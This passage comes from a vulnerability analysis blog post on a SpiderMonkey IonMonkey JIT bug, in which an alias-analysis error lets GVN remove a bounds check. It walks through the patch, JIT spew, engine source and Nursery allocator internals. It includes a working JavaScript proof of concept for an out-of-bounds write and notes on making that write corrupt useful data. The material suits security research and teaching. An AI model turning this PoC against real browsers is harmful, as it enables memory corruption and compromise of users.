     case MDefinition::Opcode::WasmStoreRef:
     case MDefinition::Opcode::ArrayJoin:
+    case MDefinition::Opcode::ArraySlice:
       return nullptr;
     default:
 #ifdef DEBUG
       // Crash when the default aliasSet is overriden, but when not added in the
       // list above.
       if (!ins->getAliasSet().isStore() ||
           ins->getAliasSet().flags() != AliasSet::Flag::Any) {
         MOZ_CRASH(
diff --git a/js/src/jit/MIR.h b/js/src/jit/MIR.h
--- a/js/src/jit/MIR.h
+++ b/js/src/jit/MIR.h
@@ -8077,19 +8077,16 @@ class MArraySlice : public MTernaryInstr
   INSTRUCTION_HEADER(ArraySlice)
   TRIVIAL_NEW_WRAPPERS
   NAMED_OPERANDS((0, object), (1, begin), (2, end))

   JSObject* templateObj() const { return templateObj_; }

   gc::InitialHeap initialHeap() const { return initialHeap_; }

-  AliasSet getAliasSet() const override {
-    return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
-  }
   bool possiblyCalls() const override { return true; }
   bool appendRoots(MRootList& roots) const override {
     return roots.append(templateObj_);
   }
 };

 class MArrayJoin : public MBinaryInstruction,
                    public MixPolicy<ObjectPolicy<0>, StringPolicy<1>>::Data {
@@ -9660,17 +9657,18 @@ class MCallGetProperty : public MUnaryIn
   // Constructors need to perform a GetProp on the function prototype.
   // Since getters cannot be set on the prototype, fetching is non-effectful.
   // The operation may be safely repeated in case of bailout.
   void setIdempotent() { idempotent_ = true; }
   AliasSet getAliasSet() const override {
     if (!idempotent_) {
       return AliasSet::Store(AliasSet::Any);
     }
-    return AliasSet::None();
+    return AliasSet::Load(AliasSet::ObjectFields | AliasSet::FixedSlot |
+                          AliasSet::DynamicSlot);
   }
   bool possiblyCalls() const override { return true; }
   bool appendRoots(MRootList& roots) const override {
     return roots.append(name_);
   }
 };

 // Inline call to handle lhs[rhs]. The first input is a Value so that this

The instructions that don't define any refinements inherit the default behavior from js::jit::MDefinition::getAliasSet (both jit::MInstruction and jit::MPhi nodes inherit jit::MDefinition):

virtual AliasSet getAliasSet() const {
  // Instructions are effectful by default.
  return AliasSet::Store(AliasSet::Any);
}

Just one more thing before getting back into Ion; here is the PoC file I use if you would like to follow along at home:

let Trigger = false;
let Arr = null;
let Spray = [];

function Target(Special, Idx, Value) {
    Arr[Idx] = 0x41414141;
    Special.slice();
    Arr[Idx] = Value;
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x7e);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0x30, Idx);
    }

    Trigger = true;
    Target(Snowflake, 0x20, 0xBBBBBBBB);
}

main();

It’s usually a good idea to compare the behavior of the patched component before and after the fix. The below shows the summary of the alias analysis pass without the fix and with it (alias-sum spew channel):

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6

Patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27

What you quickly notice is that in the fixed version there are a bunch of new load / store dependencies against the .slice statement (which translates to an arrayslice MIR instruction). As we can see in the fix for this issue, the developer basically disabled any alias set refinement and basically opt-ed out the arrayslice instruction off the alias analysis. If we take a look at the MIR graph of the Target function on a vulnerable build that is what we see (on pass#9 Alias analysis and on pass#10 GVN):

Let's first start with what the MIR graph looks like after the Alias Analysis pass. The code is pretty straight-forward to go through and is basically broken down into three pieces as the original JavaScript code:

The first step is to basically load up the Arr variable, converts the index Idx into an actual integer (tonumberint32), gets the length (it's not quite the length but it doesn't matter for now) of the array (initializedLength) and finally ensures that the index is within Arr's bounds.
Then, it invokes the slice operation (arrayslice) against the Special array passed in the first argument of the function.
Finally, like in the first step we have another set of instructions that basically do the same but this time to write a different value (passed in the third argument of the function).

This sounds like a pretty fair translation from the original code. Now, let's focus on the arrayslice instruction for a minute. In the previous section we have looked at what the Alias Analysis does and how it does it. In this case, if we look at the set of instructions coming after the 27 | arrayslice unbox9:Object constant24:Int32 arraylength26:Int32 we do not see another instruction that loads anything related to the unbox9:Object and as a result it means all those other instructions have no dependency to the slice operation. In the fixed version, even though we get the same MIR code, because the alias set for the arrayslice instruction is now Store(Any) combined with the fact that GetObject instead of grabbing its first operand it returns null, this makes genericMightAlias returns Alias::MayAlias. If the engine cannot prove no aliasing then it stays conservative and creates a dependency. That’s what explains this part in the alias-sum channel for the fixed version:

...
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27

Now looking at the graph after the GVN pass has executed we can start to see that the graph has been simplified / modified. One of the things that sounds pretty natural, is to basically eliminate a good part of the green block as it is mostly a duplicate of the blue block, and as a result only the storeelement instruction is conserved. This is safe based on the assumption that Arr cannot be changed in between. Less code, one bound check instead of two is also a good thing for code size and runtime performance which is Ion's ultimate goal.

At first sight, this might sound like a good and safe thing to do. JavaScript being JavaScript though, it turns out that if an attacker subclasses Array and provides an implementation for [Symbol.Species], it can redefine the ctor of the Array object. That coupled with the fact that slicing a JavaScript array results in a newly built array, you get the opportunity to do badness here. For example, we can set Arr's length to zero and because the bounds check happens only at the beginning of the function, we can modify its length after the 19 | boundscheck and before 36 | storeelement. If we do that, 36 effectively gives us the ability to write an Int32 out of Arr's bounds. Beautiful.

Implementing what is described above is pretty easy and here is the code for it:

let Trigger = false;
class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
        };
    }
};

The Trigger variable allows us to control the behavior of SoSpecial's ctor and decide when to trigger the resizing of the array.

One important thing that we glossed over in this section is the relationship between the alias analysis results and how those results are consumed by the GVN pass. So as usual, let’s pop the hood and have a look at what actually happens :).

Global Value Numbering

The pass that follows Alias Analysis in Ion’s pipeline is the Global Value Numbering. (abbreviated GVN) which is implemented in the ValueNumbering.cpp file:

  // Optimize the graph, performing expression simplification and
  // canonicalization, eliminating statically fully-redundant expressions,
  // deleting dead instructions, and removing unreachable blocks.
  MOZ_MUST_USE bool run(UpdateAliasAnalysisFlag updateAliasAnalysis);

The interesting part in this comment for us is the eliminating statically fully-redundant expressions part because what if we can have it incorrectly eliminate a supposedly redundant bounds check for example?

The pass itself isn’t as small as the alias analysis and looks more complicated. So we won’t follow the algorithm line by line like above but instead I am just going to try to give you an idea of the type of modification of the graph it can do. And more importantly, how does it use the dependencies established in the previous pass. We are lucky because this optimization pass is the only pass documented on Mozilla’s wiki which is great as it’s going to simplify things for us: IonMonkey/Global value numbering.

By reading the wiki page we learn a few interesting things. First, each instruction is free to opt-into GVN by providing an implementation for congruentTo and foldsTo. The default implementations of those functions are inherited from js::jit::MDefinition:

virtual bool congruentTo(const MDefinition* ins) const { return false; }
MDefinition* MDefinition::foldsTo(TempAllocator& alloc) {
  // In the default case, there are no constants to fold.
  return this;
}

The congruentTo function evaluates if the current instruction is identical to the instruction passed in argument. If they are it means one can be eliminated and replaced by the other one. The other one gets discarded and the MIR code gets smaller and simpler. This is pretty intuitive and easy to understand. As the name suggests, the foldsTo function is commonly used (but not only) for constant folding in which case it computes and creates a new MIR node that it returns. In default case, the implementation returns this which doesn’t change the node in the graph.

Another good source of help is to turn on the gvn spew channel which is useful to follow the code and what it does; here’s what it looks like:

[GVN] Running GVN on graph (with 1 blocks)
[GVN]   Visiting dominator tree (with 1 blocks) rooted at block0 (normal entry block)
[GVN]     Visiting block0
[GVN]       Recording Constant4
[GVN]       Replacing Constant5 with Constant4
[GVN]       Discarding dead Constant5
[GVN]       Replacing Constant8 with Constant4
[GVN]       Discarding dead Constant8
[GVN]       Recording Unbox9
[GVN]       Recording Unbox10
[GVN]       Recording Unbox11
[GVN]       Recording Constant12
[GVN]       Recording Slots13
[GVN]       Recording LoadSlot14
[GVN]       Recording Constant15
[GVN]       Folded ToNumberInt3216 to Unbox10
[GVN]       Discarding dead ToNumberInt3216
[GVN]       Recording Elements17
[GVN]       Recording InitializedLength18
[GVN]       Recording BoundsCheck19
[GVN]       Recording SpectreMaskIndex20
[GVN]       Discarding dead Constant22
[GVN]       Discarding dead Constant23
[GVN]       Recording Constant24
[GVN]       Recording Elements25
[GVN]       Recording ArrayLength26
[GVN]       Replacing Constant28 with Constant12
[GVN]       Discarding dead Constant28
[GVN]       Replacing Slots29 with Slots13
[GVN]       Discarding dead Slots29
[GVN]       Replacing LoadSlot30 with LoadSlot14
[GVN]       Discarding dead LoadSlot30
[GVN]       Folded ToNumberInt3231 to Unbox10
[GVN]       Discarding dead ToNumberInt3231
[GVN]       Replacing Elements32 with Elements17
[GVN]       Discarding dead Elements32
[GVN]       Replacing InitializedLength33 with InitializedLength18
[GVN]       Discarding dead InitializedLength33
[GVN]       Replacing BoundsCheck34 with BoundsCheck19
[GVN]       Discarding dead BoundsCheck34
[GVN]       Replacing SpectreMaskIndex35 with SpectreMaskIndex20
[GVN]       Discarding dead SpectreMaskIndex35
[GVN]       Recording Box37

At a high level, the pass iterates through the various instructions of our block and looks for opportunities to eliminate redundancies (congruentTo) and folds expressions (foldsTo). The logic that decides if two instructions are equivalent is in js::jit::ValueNumberer::VisibleValues::ValueHasher::match:

// Test whether two MDefinitions are congruent.
bool ValueNumberer::VisibleValues::ValueHasher::match(Key k, Lookup l) {
  // If one of the instructions depends on a store, and the other instruction
  // does not depend on the same store, the instructions are not congruent.
  if (k->dependency() != l->dependency()) {
    return false;
  }
  bool congruent =
      k->congruentTo(l);  // Ask the values themselves what they think.
#ifdef JS_JITSPEW
  if (congruent != l->congruentTo(k)) {
    JitSpew(
        JitSpew_GVN,
        "      congruentTo relation is not symmetric between %s%u and %s%u!!",
        k->opName(), k->id(), l->opName(), l->id());
  }
#endif
  return congruent;
}

Before invoking the instructions’ congruentTo implementation the algorithm verifies if the two instructions share the same dependency. This is this very line that ties together the alias analysis result and the global value numbering optimization; pretty exciting uh :)?.

To understand what is going on well we need two things: the alias summary spew to see the dependencies and the MIR code before the GVN pass has run. Here is the alias summary spew from vulnerable version:

Non patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on start6
[AliasSummaries]  loadslot30 marked depending on start6
[AliasSummaries]  elements32 marked depending on start6
[AliasSummaries]  initializedlength33 marked depending on start6

And here is the MIR code:

On this diagram I have highlighted the two code regions that we care about. Those two regions are the same which makes sense as they are the MIR code generated by the two statements Arr[Idx] = .. / Arr[Idx] = .... The GVN algorithm iterates through the instructions and eventually evaluates the first 19 | boundscheck instruction. Because it has never seen this expression it records it in case it encounters a similar one in the future. If it does, it might choose to replace one instruction with the other. And so it carries on and eventually hit the other 34 | boundscheck instruction. At this point, it wants to know if 19 and 34 are congruent and the first step to determine that is to evaluate if those two instructions share the same dependency. In the vulnerable version, as you can see in the alias summary spew, those instructions have all the same dependency to start6 which the check is satisfied. The second step is to invoke MBoundsCheck implementation of congruentTo that ensures the two instructions are the same.

  bool congruentTo(const MDefinition* ins) const override {
    if (!ins->isBoundsCheck()) {
      return false;
    }
    const MBoundsCheck* other = ins->toBoundsCheck();
    if (minimum() != other->minimum() || maximum() != other->maximum()) {
      return false;
    }
    if (fallible() != other->fallible()) {
      return false;
    }
    return congruentIfOperandsEqual(other);
  }

Because the algorithm has already ran on the previous instructions, it has already replaced 28 to 33 by 12 to 18. Which means as far as congruentTo is concerned the two instructions are the same and it is safe for Ion to remove 35 and only have one boundscheck instruction in this function. You can also see this in the GVN spew below that I edited just to show the relevant parts:

[GVN] Running GVN on graph (with 1 blocks)
[GVN]   Visiting dominator tree (with 1 blocks) rooted at block0 (normal entry block)
[GVN]     Visiting block0
...
[GVN]       Recording Constant12
[GVN]       Recording Slots13
[GVN]       Recording LoadSlot14
[GVN]       Recording Constant15
[GVN]       Folded ToNumberInt3216 to Unbox10
[GVN]       Discarding dead ToNumberInt3216
[GVN]       Recording Elements17
[GVN]       Recording InitializedLength18
[GVN]       Recording BoundsCheck19
[GVN]       Recording SpectreMaskIndex20

…

[GVN]       Replacing Constant28 with Constant12
[GVN]       Discarding dead Constant28

[GVN]       Replacing Slots29 with Slots13
[GVN]       Discarding dead Slots29

[GVN]       Replacing LoadSlot30 with LoadSlot14
[GVN]       Discarding dead LoadSlot30

[GVN]       Folded ToNumberInt3231 to Unbox10
[GVN]       Discarding dead ToNumberInt3231

[GVN]       Replacing Elements32 with Elements17
[GVN]       Discarding dead Elements32

[GVN]       Replacing InitializedLength33 with InitializedLength18
[GVN]       Discarding dead InitializedLength33

[GVN]       Replacing BoundsCheck34 with BoundsCheck19
[GVN]       Discarding dead BoundsCheck34

[GVN]       Replacing SpectreMaskIndex35 with SpectreMaskIndex20
[GVN]       Discarding dead SpectreMaskIndex35

Wow, we did it: from the alias analysis to the GVN and followed along the redundancy elimination.

Now if we have a look at the alias summary spew for a fixed version of Ion this is what we see:

Patched:
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  slots13 marked depending on start6
[AliasSummaries]  loadslot14 marked depending on start6
[AliasSummaries]  elements17 marked depending on start6
[AliasSummaries]  initializedlength18 marked depending on start6
[AliasSummaries]  elements25 marked depending on start6
[AliasSummaries]  arraylength26 marked depending on start6
[AliasSummaries]  slots29 marked depending on arrayslice27
[AliasSummaries]  loadslot30 marked depending on arrayslice27
[AliasSummaries]  elements32 marked depending on arrayslice27
[AliasSummaries]  initializedlength33 marked depending on arrayslice27

In this case, the two regions of code have a different dependency; the first block depends on start6 as above, but the second is now dependent on arrayslice27. This makes instructions not congruent and this is the very thing that prevents GVN from replacing the second region by the first one :).

Reaching state of no unknowns

Now that we finally understand what is going on, let's keep pushing until we reach what I call the state of no unknowns. What I mean by that is simply to be able to explain every little detail of the PoC and be in full control of it.

And at the end of the day, there is no magic. It's just code and the truth is out there :).

At this point this is the PoC I am trying to demystify a bit more (if you want to follow along) this is the one:

let Trigger = false;
let Arr = null;

function Target(Special, Idx, Value) {
    Arr[Idx] = 0x41414141;
    Special.slice();
    Arr[Idx] = Value;
}

class SoSpecial extends Array {
    static get [Symbol.species]() {
        return function() {
            if(!Trigger) {
                return;
            }

            Arr.length = 0;
            gc();
        };
    }
};

function main() {
    const Snowflake = new SoSpecial();
    Arr = new Array(0x7e);
    for(let Idx = 0; Idx < 0x400; Idx++) {
        Target(Snowflake, 0x30, Idx);
    }

    Trigger = true;
    Target(Snowflake, 0x20, 0xBB);
}

main();

In the following sections we walk through various aspects of the PoC, SpiderMonkey and IonMonkey internals in order to gain an even better understanding of all the behaviors at play here. It might be only < 100 lines of code but a lot of things happen :).

Phew, you made it here! I guess it is a good point where people that were only interested in the root-cause of this issue can stop reading: we have shed enough light on the vulnerability and its roots. For the people that want more though, and that still have a lot of questions like 'why is this working and this is not', 'why is it not crashing reliably' or 'why does this line matters' then fasten your seat belt and let's go!

The Nursery

The first stop is to explain in more detail how one of the three heap allocators in Spidermonkey works: the Nursery.

The Nursery is actually, for once, a very simple allocator. It is useful and important to know how it is designed as it gives you natural answers to the things it is able to do and the thing it cannot (by design).

The Nursery is specific to a JSRuntime and by default has a maximum size of 16MB (you can tweak the size with --nursery-size with the JavaScript shell js.exe). The memory is allocated by VirtualAlloc (by chunks of 0x100000 bytes PAGE_READWRITE memory) in js::gc::MapAlignedPages and here is an example call-stack:

 # Call Site
00 KERNELBASE!VirtualAlloc
01 js!js::gc::MapAlignedPages
02 js!js::gc::GCRuntime::getOrAllocChunk
03 js!js::Nursery::init
04 js!js::gc::GCRuntime::init
05 js!JSRuntime::init
06 js!js::NewContext
07 js!main

This contiguous region of memory is called a js::NurseryChunk and the allocator places such a structure there. The js::NurseryChunk starts with the actual usable space for allocations and has a trailer metadata at the end:

const size_t ChunkShift = 20;
const size_t ChunkSize = size_t(1) << ChunkShift;

const size_t ChunkTrailerSize = 2 * sizeof(uintptr_t) + sizeof(uint64_t);

static const size_t NurseryChunkUsableSize =
      gc::ChunkSize - gc::ChunkTrailerSize;

struct NurseryChunk {
  char data[Nursery::NurseryChunkUsableSize];
  gc::ChunkTrailer trailer;

  static NurseryChunk* fromChunk(gc::Chunk* chunk);
  void poisonAndInit(JSRuntime* rt, size_t extent = ChunkSize);
  void poisonAfterSweep(size_t extent = ChunkSize);
  uintptr_t start() const { return uintptr_t(&data); }
  uintptr_t end() const { return uintptr_t(&trailer); }
  gc::Chunk* toChunk(JSRuntime* rt);
};

Every js::NurseryChunk is 0x100000 bytes long (on x64) or 256 pages total and has effectively 0xffe8 usable bytes (the rest is metadata). The allocator purposely tries to fragment those region in the virtual address space of the process (in x64) and so there is not a specific offset in between all those chunks.

The way allocations are organized in this region is pretty easy: say the user asks for a 0x30 bytes allocation, the allocator returns the current position for backing the allocation and the allocator simply bumps its current location by +0x30. The biggest allocation request that can go through the Nursery is 1024 bytes long (defined by js::Nursery::MaxNurseryBufferSize) and if it exceeds this size usually the allocation is serviced from the jemalloc heap (which is the third heap in Firefox: Nursery, Tenured and jemalloc).

When a chunk is full, the Nursery can allocate another one if it hasn't reached its maximum size yet; if it hasn't it sets up a new js::NurseryChunk (as in the above call-stack) and update the current one with the new one. If the Nursery has reached its maximum capacity it triggers a minor garbage collection which collects the objects that needs collection (the one having no references anymore) and move all the objects still alive on the Tenured heap. This gives back a clean slate for the Nursery.

Even though the Nursery doesn't keep track of the various objects it has allocated and because they are all allocated contiguously the runtime is basically able to iterate over the objects one by one and sort out the boundary of the current object and moves to the next. Pretty cool.

While writing up this section I also added a new utility command in sm.js called !in_nursery <addr> that tells you if addr belongs to the Nursery or not. On top of that, it shows you interesting information about its internal state. This is what it looks like:

0:008> !in_nursery 0x19767e00df8
Using previously cached JSContext @0x000001fe17318000
0x000001fe1731cde8: js::Nursery
 ChunkCountLimit: 0x0000000000000010 (16 MB)
        Capacity: 0x0000000000fffe80 bytes
    CurrentChunk: 0x0000019767e00000
        Position: 0x0000019767e00eb0
          Chunks:
            00: [0x0000019767e00000 - 0x0000019767efffff]
            01: [0x00001fa2aee00000 - 0x00001fa2aeefffff]
            02: [0x0000115905000000 - 0x00001159050fffff]
            03: [0x00002fc505200000 - 0x00002fc5052fffff]
            04: [0x000020d078700000 - 0x000020d0787fffff]
            05: [0x0000238217200000 - 0x00002382172fffff]
            06: [0x00003ff041f00000 - 0x00003ff041ffffff]
            07: [0x00001a5458700000 - 0x00001a54587fffff]
-------
0x19767e00df8 has been found in the js::NurseryChunk @0x19767e00000!

Understanding what happens to Arr

The first thing that was bothering me is the very specific number of items the array is instantiated with:

Arr = new Array(0x7e);

People following at home will also notice that modifying this constant takes us from a PoC that crashes reliably to... a PoC that may not even crash anymore.

Let's start at the beginning and gather information. This is an array that gets allocated in the Nursery (also called DefaultHeap) with the OBJECT2_BACKGROUND kind which means it is 0x30 bytes long - basically just enough to pack a js::NativeObject (0x20 bytes) as well as a js::ObjectElements (0x10 bytes):

0:000> ?? sizeof(js!js::NativeObject) + sizeof(js!js::ObjectElements)
unsigned int64 0x30

0:000> r
js!js::AllocateObject<js::CanGC>:
00007ff7`87ada9b0 4157            push    r15

0:000> ?? kind
js::gc::AllocKind OBJECT2_BACKGROUND (0n5)

0:000> x js!js::gc::Arena::ThingSizes
00007ff7`88133fe0 js!js::gc::Arena::ThingSizes = <no type information>

0:000> dds 00007ff7`88133fe0 + (5 * 4) l1
00007ff7`88133ff4  00000030

0:000> kc
 # Call Site
00 js!js::AllocateObject<js::CanGC>
01 js!js::ArrayObject::createArray
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main
0d js!__scrt_common_main_seh
0e KERNEL32!BaseThreadInitThunk
0f ntdll!RtlUserThreadStart

You might be wondering where is the space for the 0x7e elements though? Well, once the shell of the object is constructed, it grows the elements_ space to be able to store that many elements. The number of elements is being adjusted in js::NativeObject::goodElementsAllocationAmount to 0x80 (which is coincidentally the biggest allocation that the Nursery can service as we've seen in the previous section: 0x400 bytes)) and then js::NativeObject::growElements calls into the Nursery allocator to allocate 0x80 * sizeof(JS::Value) = 0x400 bytes:

0:000> 
js!js::NativeObject::goodElementsAllocationAmount+0x264:
00007ff6`e5dbfae4 418909          mov     dword ptr [r9],ecx ds:00000028`cc9fe9ac=00000000

0:000> r @ecx
ecx=80

0:000> kc
 # Call Site
00 js!js::NativeObject::goodElementsAllocationAmount
01 js!js::NativeObject::growElements
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main

...

0:000> t
js!js::Nursery::allocateBuffer:
00007ff6`e6029c70 4156            push    r14

0:000> r @r8
r8=0000000000000400

0:000> kc
 # Call Site
00 js!js::Nursery::allocateBuffer
01 js!js::NativeObject::growElements
02 js!NewArrayTryUseGroup<2046>
03 js!ArrayConstructorImpl
04 js!js::ArrayConstructor
05 js!InternalConstruct
06 js!Interpret
07 js!js::RunScript
08 js!js::ExecuteKernel
09 js!js::Execute
0a js!JS_ExecuteScript
0b js!Process
0c js!main

Once the allocation is done, it copies the old elements_ content into the new one, updates the Array object and we are done with our Array:

0:000> dt js::NativeObject @r14 elements_
   +0x018 elements_        : 0x000000c9`ffb000f0 js::HeapSlot

0:000> dqs @r14
000000c9`ffb000b0  00002bf2`fa07deb0
000000c9`ffb000b8  00002bf2`fa0987e8
000000c9`ffb000c0  00000000`00000000
000000c9`ffb000c8  000000c9`ffb000f0
000000c9`ffb000d0  00000000`00000000 <- Lost / unused space
000000c9`ffb000d8  0000007e`00000000 <- Lost / unused space
000000c9`ffb000e0  00000000`00000000
000000c9`ffb000e8  0000007e`0000007e

000000c9`ffb000f0  2f2f2f2f`2f2f2f2f
000000c9`ffb000f8  2f2f2f2f`2f2f2f2f
000000c9`ffb00100  2f2f2f2f`2f2f2f2f
000000c9`ffb00108  2f2f2f2f`2f2f2f2f
000000c9`ffb00110  2f2f2f2f`2f2f2f2f
000000c9`ffb00118  2f2f2f2f`2f2f2f2f
000000c9`ffb00120  2f2f2f2f`2f2f2f2f
000000c9`ffb00128  2f2f2f2f`2f2f2f2f

One small remark is that because we first allocated 0x30 bytes, we originally had the js::ObjectElements at 000000c9ffb000d0. Because we needed a bigger space, we allocated space for 0x7e elements and two more JS::Value (in size) to be able to store the new js::ObjectElements (this object is always right before the content of the array). The result of this is the old js::ObjectElements at 000000c9ffb000d0/8 is now unused / lost space; which is kinda fun I suppose :).

This is also very similar to what happens when we trigger the Arr.length = 0 statement; the Nursery allocator is invoked to replace the to-be-shrunk elements_ array. This is implemented in js::NativeObject::shrinkElements. This time 8 (which is the minimum and is defined as js::NativeObject::SLOT_CAPACITY_MIN) is returned by js::NativeObject::goodElementsAllocationAmount which results in an allocation request of 8*8=0x40 bytes from the Nursery. js::Nursery::reallocateBuffer decides that this is a no-op because the new size (0x40) is smaller than the old one (0x400) and because the chunk is backed by a Nursery buffer:

void* js::Nursery::reallocateBuffer(JSObject* obj, void* oldBuffer,
                                    size_t oldBytes, size_t newBytes) {
  // ...
  /* The nursery cannot make use of the returned slots data. */
  if (newBytes < oldBytes) {
    return oldBuffer;
  }
  // ...
}

And as a result, our array basically stays the same; only the js::ObjectElement part is updated:

0:000> !smdump_jsobject 0x00000c9ffb000b0
c9ffb000b0: js!js::ArrayObject:            Length: 0 <- Updated length
c9ffb000b0: js!js::ArrayObject:          Capacity: 6 <- This is js::NativeObject::SLOT_CAPACITY_MIN - js::ObjectElements::VALUES_PER_HEADER
c9ffb000b0: js!js::ArrayObject: InitializedLength: 0
c9ffb000b0: js!js::ArrayObject:           Content: []
@$smdump_jsobject(0x00000c9ffb000b0)

0:000> dt js::NativeObject 0x00000c9ffb000b0 elements_
   +0x018 elements_ : 0x000000c9`ffb000f0 js::HeapSlot

Now if you think about it we are able to store arbitrary values in out-of-bounds memory. We fully control the content, and we somewhat control the offset (up to the size of the initial array). But how can we overwrite actually useful data?

Sure we can make sure to have our array followed by something interesting. Although,if you think about it, we will shrink back the array length to zero and then trigger the vulnerability. Well, by design the object we placed behind us is not reachable by our index because it was precisely adjacent to the original array. So this is not enough and we need to find a way to have the shrunken array being moved into a region where it gets adjacent with something interesting. In this case we will end up with interesting corruptible data in the reach of our out-of-bounds.

A minor-gc should do the trick as it walks the Nursery, collects the objects that needs collection and moves all the other ones to the Tenured heap. When this happens, it is fair to guess that we get moved to a memory chunk that can just fit the new object.

Code generation with IonMonkey

Before beginning, one thing that you might have been wondering at this point is where do we actually check the implementation of the code generation for a given LIR instruction? (MIR gets lowered to LIR and code-generation kicks in to generate native code)

Like how does storeelement get lowered to native code (does MIR storeelement get translated to LIR LStoreElement instruction?) This would be useful for us to know a bit more about the out-of-bounds memory access we can trigger.

You can find those details in what is called the CodeGenerator which lives in src/jit/CodeGenerator.cpp. For example, you can quickly see that most of the code generation related to the arrayslice instruction happens in js::ArraySliceDense:

void CodeGenerator::visitArraySlice(LArraySlice* lir) {
  Register object = ToRegister(lir->object());
  Register begin = ToRegister(lir->begin());
  Register end = ToRegister(lir->end());
  Register temp1 = ToRegister(lir->temp1());
  Register temp2 = ToRegister(lir->temp2());

  Label call, fail;

  // Try to allocate an object.
  TemplateObject templateObject(lir->mir()->templateObj());
  masm.createGCObject(temp1, temp2, templateObject, lir->mir()->initialHeap(),
                      &fail);

  // Fixup the group of the result in case it doesn't match the template object.
  masm.copyObjGroupNoPreBarrier(object, temp1, temp2);

  masm.jump(&call);
  {
    masm.bind(&fail);
    masm.movePtr(ImmPtr(nullptr), temp1);
  }
  masm.bind(&call);

  pushArg(temp1);
  pushArg(end);
  pushArg(begin);
  pushArg(object);

  using Fn =
      JSObject* (*)(JSContext*, HandleObject, int32_t, int32_t, HandleObject);
  callVM<Fn, ArraySliceDense>(lir);
}

Most of the MIR instructions translate one-to-one to a LIR instruction (MIR instructions start with an M like MStoreElement, and LIR instruction starts with an L like LStoreElement); there are about 309 different MIR instructions (see objdir/js/src/jit/MOpcodes.h) and 434 LIR instructions (see objdir/js/src/jit/LOpcodes.h).

The function jit::CodeGenerator::visitArraySlice function is directly invoked from js::jit::CodeGenerator in a switch statement dispatching every LIR instruction to its associated handler (note that I have cleaned-up the function below by removing a bunch of useless ifdef blocks for our investigation):

bool CodeGenerator::generateBody() {
  JitSpew(JitSpew_Codegen, "==== BEGIN CodeGenerator::generateBody ====\n");
  IonScriptCounts* counts = maybeCreateScriptCounts();

  for (size_t i = 0; i < graph.numBlocks(); i++) {
    current = graph.getBlock(i);

    // Don't emit any code for trivial blocks, containing just a goto. Such
    // blocks are created to split critical edges, and if we didn't end up
    // putting any instructions in them, we can skip them.
    if (current->isTrivial()) {
      continue;
    }

    masm.bind(current->label());

    mozilla::Maybe<ScriptCountBlockState> blockCounts;
    if (counts) {
      blockCounts.emplace(&counts->block(i), &masm);
      if (!blockCounts->init()) {
        return false;
      }
    }
    TrackedOptimizations* last = nullptr;

    for (LInstructionIterator iter = current->begin(); iter != current->end();
         iter++) {
      if (!alloc().ensureBallast()) {
        return false;
      }

      if (counts) {
        blockCounts->visitInstruction(*iter);
      }

      if (iter->mirRaw()) {
        // Only add instructions that have a tracked inline script tree.
        if (iter->mirRaw()->trackedTree()) {
          if (!addNativeToBytecodeEntry(iter->mirRaw()->trackedSite())) {
            return false;
          }
        }

        // Track the start native offset of optimizations.
        if (iter->mirRaw()->trackedOptimizations()) {
          if (last != iter->mirRaw()->trackedOptimizations()) {
            DumpTrackedSite(iter->mirRaw()->trackedSite());
            DumpTrackedOptimizations(iter->mirRaw()->trackedOptimizations());
            last = iter->mirRaw()->trackedOptimizations();
          }
          if (!addTrackedOptimizationsEntry(
                  iter->mirRaw()->trackedOptimizations())) {
            return false;
          }
        }
      }

      setElement(*iter);  // needed to encode correct snapshot location.

      switch (iter->op()) {
#ifndef JS_CODEGEN_NONE
#  define LIROP(op)              \
    case LNode::Opcode::op:      \
      visit##op(iter->to##op()); \
      break;
        LIR_OPCODE_LIST(LIROP)
#  undef LIROP
#endif
        case LNode::Opcode::Invalid:
        default:
          MOZ_CRASH("Invalid LIR op");
      }

      // Track the end native offset of optimizations.
      if (iter->mirRaw() && iter->mirRaw()->trackedOptimizations()) {
        extendTrackedOptimizationsEntry(iter->mirRaw()->trackedOptimizations());
      }
    }
    if (masm.oom()) {
      return false;
    }
  }

